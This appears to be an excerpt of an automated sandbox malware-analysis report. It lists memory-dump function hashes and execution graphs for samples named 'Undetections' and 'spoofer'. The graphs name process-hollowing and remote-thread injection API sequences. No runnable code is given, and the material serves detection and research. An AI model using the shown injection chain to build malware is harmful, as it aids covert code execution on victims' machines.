                                                                                                                                                                                                            Function 04EA2CF8 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 7c2529999549bdcc26de45ea212e4e675aa0c94fbaa9b710304cf96c36c455ed
                                                                                                                                                                                                            • Instruction ID: 5a978ab654b5e23d06e1b2e9a3491d936df539ef28c5ab37b1ad4c0883bdd78e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c2529999549bdcc26de45ea212e4e675aa0c94fbaa9b710304cf96c36c455ed
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6712BFF04027469AE710DF65E9682893BF1FB45328B54C329DA612B3E4D7BD198BCF84
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FDD620 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108574436.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fd0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3a9ea57632f804cd6cd792488cf2d076ffd485427a25e1f36770a21eb78b8cc8
                                                                                                                                                                                                            • Instruction ID: c2d741e21de119b7fd9c587ac6fc529a70975b73baf582163bb3b9075b4ce425
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a9ea57632f804cd6cd792488cf2d076ffd485427a25e1f36770a21eb78b8cc8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BE10B35D20B5A8ACB15EF64D950AD9F7B1FF95300F10C7AAE0493B225EB70AAC5CB41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FDD630 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108574436.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fd0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 2c50a9ab626f4cdacd4fc9afb7de56d71e3cba20c10ef9b58ce00cef8d69bdbf
                                                                                                                                                                                                            • Instruction ID: 447a0de6dda1c7dcc82818fff90b2a368e6c43c3bf0b3b5022d733bf5558b33a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c50a9ab626f4cdacd4fc9afb7de56d71e3cba20c10ef9b58ce00cef8d69bdbf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62D1EB35920B5A8ACB15EF64D950AD9F7B1FF95300F10C7AAE0493B224EF70AAC5CB41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 04EA06EC Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 6f0fdeb065a5777358d2589d8e2bed8d1a8be70bac78d35dac2d1d2650ad46d8
                                                                                                                                                                                                            • Instruction ID: 90dafe6b995959b9cd1e9e4701ec92962a8f84991a522bfe41690099439678ab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f0fdeb065a5777358d2589d8e2bed8d1a8be70bac78d35dac2d1d2650ad46d8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2A16B36A002198FCF15DFA4C8445AEB7B2FF85304B1595AAE906BF225DB35F925CF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 04EA2CE8 Relevance: .2, Instructions: 225COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c75652bf2ecb84b28c03bb9c9ac46d60557cd126902db31fdd1771d5d47c5a55
                                                                                                                                                                                                            • Instruction ID: a44cdbd90923fa63cfea122faa2fd30f6f0c8251288bef43a8ad9a4832762e3b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c75652bf2ecb84b28c03bb9c9ac46d60557cd126902db31fdd1771d5d47c5a55
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21C1F5B08027469AE710DF65E9681897BF1FB85324F14C329D9616B3E4D7BC198BCF84
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DEC710 Relevance: .2, Instructions: 211COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: dea3356014cdc596b00ddd116319835516db548f6779953da90c32e4b1954b2b
                                                                                                                                                                                                            • Instruction ID: f7dd108240f5e1a788c795d7555c24abd197fd5945e31cf042f7eafac43428cf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dea3356014cdc596b00ddd116319835516db548f6779953da90c32e4b1954b2b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5381BE72E00609DBCB10DFA5D8442EEFBB2FF84341F19C53AD455A7698EB398A56CB40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DECBD8 Relevance: .2, Instructions: 211COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f89fe99e9bed46913f584f6012019ae63cd5331ea054cef89e1a7fc00e62df26
                                                                                                                                                                                                            • Instruction ID: e090774da459492e7be0859e1daca07a736ac4c82571786adffa9b6036149b0c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f89fe99e9bed46913f584f6012019ae63cd5331ea054cef89e1a7fc00e62df26
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC81B272E00609DBCB10DFA5D8442EDF7B2FF84340F29C53AD455A7698EB399A5ACB40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DEA708 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 8eda8aaa724ef3c90073f7780de8f56c4cda3990d0f418e63aa84a486e80da6a
                                                                                                                                                                                                            • Instruction ID: a869a6b1e6696d504ca1d96284670452fc2f4f6ddb28b82e9eaa7251a67773f4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8eda8aaa724ef3c90073f7780de8f56c4cda3990d0f418e63aa84a486e80da6a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA51AF75E002189FDB04DFE9D984AADBBF2BF89300F249129E809BB264D7349959CF14
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 04EABC82 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: b4eb3d9d077ac7d9ee343f52c7597f8dccda6849990c9df6cecbf4579da14ae7
                                                                                                                                                                                                            • Instruction ID: 654eb002988f215dd21e5eada999d5a1672894217211c32b9458858ab633cab5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4eb3d9d077ac7d9ee343f52c7597f8dccda6849990c9df6cecbf4579da14ae7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF51C675E046188FDB18CFAAD9406DDBBF2BF89304F14D16AD618AF264EB30A955CF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0F0F9E38 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 7edbc2c1739ea673922782719224ebade5fe83dc1f838b9b268cde320aa53a41
                                                                                                                                                                                                            • Instruction ID: d4dc99d5837cd1b6d736a6851f40371f8f5f11e55711ca7bf5c908c15b6dbaa2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7edbc2c1739ea673922782719224ebade5fe83dc1f838b9b268cde320aa53a41
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 791181357007158FDB65CB68C880BAE73F6EFC8210F14416AD616D76A2DB34ED49C791
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:57.8%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                            Signature Coverage:14.6%
                                                                                                                                                                                                            Total number of Nodes:41
                                                                                                                                                                                                            Total number of Limit Nodes:3
                                                                                                                                                                                                            execution_graph 328 12c0558 329 12c055d 328->329 333 12c0970 329->333 342 12c0961 329->342 330 12c085a 334 12c0992 333->334 351 12c0edc 334->351 356 12c0ae0 334->356 335 12c09ce 336 12c0a21 335->336 361 12c0530 335->361 336->330 343 12c0970 342->343 349 12c0edc VirtualProtect 343->349 350 12c0ae0 VirtualProtect 343->350 344 12c09ce 345 12c0530 VirtualProtect 344->345 348 12c0a21 344->348 346 12c09f3 345->346 347 12c053c CreateRemoteThread 346->347 346->348 347->348 348->330 349->344 350->344 352 12c0e7f 351->352 353 12c1033 VirtualProtect 352->353 355 12c0fc3 352->355 354 12c1070 353->354 354->335 355->335 357 12c0b17 356->357 360 12c0ca8 356->360 358 12c1033 VirtualProtect 357->358 357->360 359 12c1070 358->359 359->335 360->335 362 12c0fe8 VirtualProtect 361->362 364 12c09f3 362->364 364->336 365 12c053c 364->365 366 12c10b0 CreateRemoteThread 365->366 368 12c115b 366->368 368->336 376 12c10a8 377 12c10b0 CreateRemoteThread 376->377 379 12c115b 377->379 369 31724ad 372 31724e5 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 369->372 371 31726c2 WriteProcessMemory 373 3172707 371->373 372->371 374 317270c WriteProcessMemory 373->374 375 3172749 WriteProcessMemory Wow64SetThreadContext ResumeThread 373->375 374->373

                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 031724AD Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0317261C
                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0317262F
                                                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0317264D
                                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03172671
                                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0317269C
                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 031726F4
                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0317273F
                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0317277D
                                                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 031727B9
                                                                                                                                                                                                            • ResumeThread.KERNELBASE(?), ref: 031727C8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1755614040.0000000003172000.00000040.00000800.00020000.00000000.sdmp, Offset: 03172000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3172000_spoofer.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                            • String ID: GetP$Load$aryA$ress
                                                                                                                                                                                                            • API String ID: 2687962208-977067982
                                                                                                                                                                                                            • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                            • Instruction ID: 804ed2fdf737dabf9d89eb400d5d17f2d4953178609f6cb5949a2d9525aad271
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3B1E77664024AAFDB60CF68CC80BDA77A5FF8C714F158564EA0CAB341D774FA428B94
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 012C0AE0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 465COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 23 12c0ae0-12c0b11 24 12c0ca8-12c0caf 23->24 25 12c0b17-12c0b1c 23->25 26 12c0b1e-12c0b31 25->26 27 12c0b58-12c0b5d 25->27 26->27 28 12c0b33-12c0b46 26->28 31 12c0b64-12c0b69 27->31 28->27 29 12c0b48-12c0b56 28->29 29->31 32 12c0b6f-12c0b82 31->32 33 12c0cb2-12c0d10 31->33 32->33 34 12c0b88-12c0b99 32->34 42 12c0d13-12c0d8e 33->42 34->33 35 12c0b9f-12c0bbc 34->35 35->33 39 12c0bc2-12c0bde 35->39 39->33 43 12c0be4-12c0c00 39->43 62 12c0fcd-12c106e VirtualProtect 42->62 63 12c0d94-12c0db3 42->63 43->33 47 12c0c06-12c0c16 43->47 47->33 48 12c0c1c-12c0c2c 47->48 48->33 50 12c0c32-12c0c43 48->50 50->33 51 12c0c45-12c0c56 50->51 51->33 52 12c0c58-12c0c6b 51->52 52->33 54 12c0c6d-12c0c7e 52->54 54->33 55 12c0c80-12c0c91 54->55 55->33 57 12c0c93-12c0ca2 55->57 57->24 57->25 69 12c1077-12c1098 62->69 70 12c1070-12c1076 62->70 63->42 66 12c0db9-12c0dc4 63->66 68 12c0dc7-12c0dce 66->68 71 12c0e18-12c0e20 68->71 72 12c0dd0-12c0dd7 68->72 70->69 71->62 75 12c0e26-12c0e33 71->75 72->71 73 12c0dd9-12c0de4 72->73 73->62 76 12c0dea-12c0df7 73->76 75->62 77 12c0e39-12c0e46 75->77 76->62 78 12c0dfd-12c0e0c 76->78 77->62 79 12c0e4c-12c0e58 77->79 80 12c0e0e-12c0e14 78->80 81 12c0e15 78->81 79->62 82 12c0e5e-12c0e6e 79->82 80->81 81->71 82->68 83 12c0e74-12c0e7c 82->83 84 12c0e7f-12c0e8b 83->84 85 12c0fb6-12c0fbd 84->85 86 12c0e91-12c0e9a 84->86 85->84 89 12c0fc3-12c0fca 85->89 87 12c0e9c-12c0ea2 86->87 88 12c0ea3-12c0eb4 86->88 87->88 88->62 90 12c0eba-12c0ec6 88->90 91 12c0ecf-12c0eec 90->91 92 12c0ec8-12c0ece 90->92 91->62 94 12c0ef2-12c0eff 91->94 92->91 94->62 95 12c0f05-12c0f10 94->95 96 12c0fa4-12c0fb0 95->96 97 12c0f16-12c0f1d 95->97 96->85 96->86 97->96 98 12c0f23-12c0f2b 97->98 98->62 99 12c0f31-12c0f40 98->99 99->62 100 12c0f46-12c0f5e 99->100 101 12c0f68-12c0f73 100->101 102 12c0f60-12c0f67 100->102 101->62 103 12c0f75-12c0f7f 101->103 102->101 104 12c0f86-12c0f8e 103->104 105 12c0f9c-12c0fa2 104->105 106 12c0f90-12c0f92 104->106 105->96 106->105
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1754346859.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_12c0000_spoofer.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                                            • API String ID: 0-2564639436
                                                                                                                                                                                                            • Opcode ID: cbe533d9424ef08f743da6c11d88969b4b206e99ca0c293006f5ab2d758b8edf
                                                                                                                                                                                                            • Instruction ID: 56d78a9b0845865a705f5aebb126c5c34186953979ceff84a54c5bdc1183bf3d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbe533d9424ef08f743da6c11d88969b4b206e99ca0c293006f5ab2d758b8edf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5512A035A11255CFCB02CFA9C0806EDFFF1BF59314B288699E595AB252C730ED81CBA4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 012C10A8 Relevance: 1.6, APIs: 1, Instructions: 69threadinjectionCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 115 12c10a8-12c110a 118 12c110c-12c1118 115->118 119 12c111a-12c1159 CreateRemoteThread 115->119 118->119 120 12c115b-12c1161 119->120 121 12c1162-12c1176 119->121 120->121
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 012C114C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1754346859.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_12c0000_spoofer.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateRemoteThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4286614544-0
                                                                                                                                                                                                            • Opcode ID: 8a2fda8c2d3481b1dffe6f7e30c33d6e1471b12801b40ced68eac3a00b2bc0dc
                                                                                                                                                                                                            • Instruction ID: cd4ddd7eea3ca3cd72845ec80c8ad43b1dffff3fc46815548455b745e299cb5a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a2fda8c2d3481b1dffe6f7e30c33d6e1471b12801b40ced68eac3a00b2bc0dc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE31D3B5901249DFCB10CFA9D985ADEBFF5FF48310F208429E918A7251D375A950CFA4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 012C053C Relevance: 1.6, APIs: 1, Instructions: 69threadinjectionCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 107 12c053c-12c110a 110 12c110c-12c1118 107->110 111 12c111a-12c1159 CreateRemoteThread 107->111 110->111 112 12c115b-12c1161 111->112 113 12c1162-12c1176 111->113 112->113
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 012C114C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1754346859.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_12c0000_spoofer.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateRemoteThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4286614544-0
                                                                                                                                                                                                            • Opcode ID: 39d4b9d1ef4ae4bb97275d9d9a1b250fc56534d865f4360686bacca86cc38334
                                                                                                                                                                                                            • Instruction ID: 513a9bc739741282acb722a01c21ebb59727edc730e66fde2b60301aa37de2f3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39d4b9d1ef4ae4bb97275d9d9a1b250fc56534d865f4360686bacca86cc38334
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 173102B1900249DFCB10CF99D885ADEBBF5FB48310F208129EA18A7310D375A950CFA4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 012C0530 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 123 12c0530-12c106e VirtualProtect 126 12c1077-12c1098 123->126 127 12c1070-12c1076 123->127 127->126
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualProtect.KERNELBASE(04173584,?,?,?), ref: 012C1061
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.1754346859.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_12c0000_spoofer.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                                                                                            • Opcode ID: 33b6987748dad2bbaf436df3e9257acb6eacb22a9cecddbbdbe6c4b5b2bccc4c
                                                                                                                                                                                                            • Instruction ID: 58dc7518c511a98d3372a79008d84b6dc2ba4f592b53e5bfb5fa623360082df6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33b6987748dad2bbaf436df3e9257acb6eacb22a9cecddbbdbe6c4b5b2bccc4c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 822104B1910259EFCB00DF9AC885BDEFBF4FB08320F10812AE918A7241D374A954CFA4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                            Execution Coverage:5.6%
                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                            Signature Coverage:10.1%
                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                            Total number of Limit Nodes:27
                                                                                                                                                                                                            execution_graph 71367 418360 71392 402780 71367->71392 71375 418382 71490 40fec0 lstrlenA 71375->71490 71378 40fec0 3 API calls 71379 4183aa 71378->71379 71380 40fec0 3 API calls 71379->71380 71381 4183b1 71380->71381 71494 40fde0 71381->71494 71383 4183ba 71384 4183da OpenEventA 71383->71384 71385 41841c 71384->71385 71386 4183ec 71384->71386 71388 418425 CreateEventA 71385->71388 71387 4183f0 CloseHandle Sleep 71386->71387 71389 41840a OpenEventA 71386->71389 71387->71386 71498 417ae0 71388->71498 71389->71385 71389->71387 71658 4022a0 LocalAlloc 71392->71658 71394 402791 71395 4022a0 10 API calls 71394->71395 71396 4027a7 71395->71396 71397 4022a0 10 API calls 71396->71397 71398 4027bd 71397->71398 71399 4022a0 10 API calls 71398->71399 71400 4027d3 71399->71400 71401 4022a0 10 API calls 71400->71401 71402 4027e9 71401->71402 71403 4022a0 10 API calls 71402->71403 71404 4027ff 71403->71404 71405 4022a0 10 API calls 71404->71405 71406 402818 71405->71406 71407 4022a0 10 API calls 71406->71407 71408 40282e 71407->71408 71409 4022a0 10 API calls 71408->71409 71410 402844 71409->71410 71411 4022a0 10 API calls 71410->71411 71412 40285a 71411->71412 71413 4022a0 10 API calls 71412->71413 71414 402870 71413->71414 71415 4022a0 10 API calls 71414->71415 71416 402886 71415->71416 71417 4022a0 10 API calls 71416->71417 71418 40289f 71417->71418 71419 4022a0 10 API calls 71418->71419 71420 4028b5 71419->71420 71421 4022a0 10 API calls 71420->71421 71422 4028cb 71421->71422 71423 4022a0 10 API calls 71422->71423 71424 4028e1 71423->71424 71425 4022a0 10 API calls 71424->71425 71426 4028f7 71425->71426 71427 4022a0 10 API calls 71426->71427 71428 40290d 71427->71428 71429 4022a0 10 API calls 71428->71429 71430 402926 71429->71430 71431 4022a0 10 API calls 71430->71431 71432 40293c 71431->71432 71433 4022a0 10 API calls 71432->71433 71434 402952 71433->71434 71435 4022a0 10 API calls 71434->71435 71436 402968 71435->71436 71437 4022a0 10 API calls 71436->71437 71438 40297e 71437->71438 71439 4022a0 10 API calls 71438->71439 71440 402994 71439->71440 71441 4022a0 10 API calls 71440->71441 71442 4029ad 71441->71442 71443 4022a0 10 API calls 71442->71443 71444 4029c3 71443->71444 71445 4022a0 10 API calls 71444->71445 71446 4029d9 71445->71446 71447 4022a0 10 API calls 71446->71447 71448 4029ef 71447->71448 71449 4022a0 10 API calls 71448->71449 71450 402a05 71449->71450 71451 4022a0 10 API calls 71450->71451 71452 402a1b 71451->71452 71453 4022a0 10 API calls 71452->71453 71454 402a34 71453->71454 71455 4022a0 